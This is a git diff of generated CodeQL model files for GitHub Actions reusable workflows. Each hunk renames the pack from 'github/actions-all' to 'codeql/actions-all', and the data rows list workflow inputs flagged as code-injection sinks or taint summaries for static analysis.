a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 0c4d975e0129..2cdfb52d976f 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 64fc3792659c..1aae8bd0fd4d 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index f48be6693d06..c157f1bbca13 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index f2ebae0b0eac..c7e2c60b08e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index ec591db22ac9..fa0afdae7691 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 06fdea3f8a26..11a756cc063f 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index b864551b3fbe..748d28d75452 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index fdb499a81dcb..5916205cea96 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index c831a5d6d8f9..b62e5e5599f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index d9d4e9bd2fa9..6f841faecce8 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 4091c74dee5a..3c986e3d00be 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1c6d8804d6d1..32de8a5131df 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index f94c87537cf4..a28e8e121d28 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index efb8e467a0a0..ed8f60f413ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 8a7b36e365c5..476d40b52061 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 0d6fb59ed509..c8a534d031d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 74bdb5ab2801..5d3b6e2a8845 100644 
--- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 038fd953d6e8..b402ab78ef5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 0c185f4cbd56..2abf8ff1d320 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 44e89b4e2518..4183d01143fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 6b4feeedf62f..eebeabb0353c 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 43e993417170..7279ad6d976f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index cc5fb5c8d57a..ccd29346a108 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 64ca7805d901..0d162f9c66b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eab60f252385..730a0fc622dd 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index fc91813e01b7..7c74a66467b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 253c82f4bef9..af7c7e941118 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index eb1b3df774d9..01a7939de43e 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 3c6e1aaf658e..efd1a84bfb5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 3f66f2878303..715a3861fd92 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b45eabdf202b..bad92ff76790 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 76bb69800a9a..90503b3ad3e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 9af37394143f..3d6de142622a 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9d0113eb8ece..ab48425c038b 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 90ad3c0f9a18..6c0165b65a91 100644 
--- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index e07d783ae53d..f33f433df1f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 3d698b0a84b2..fb700fa7a892 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 364bd19139e0..60ab0a23c746 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 85d150cf11c6..e0a72159a7b0 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 612a114d79cf..7483ab3366ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 86267e5a9217..137558d68d01 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 31d0192f3fba..cb48bce89cfa 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 5116c943f690..9f8338302a3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 85cb45df8951..49f73a1d620f 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 4167f4bb982a..e1e8de225309 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 04b9325cecd9..c2f634f7d000 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 60b966d98a4a..89dcb32c453b 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index bbca585931c5..2ea319538441 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index a0b7c4189672..b9e9d879a66a 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml 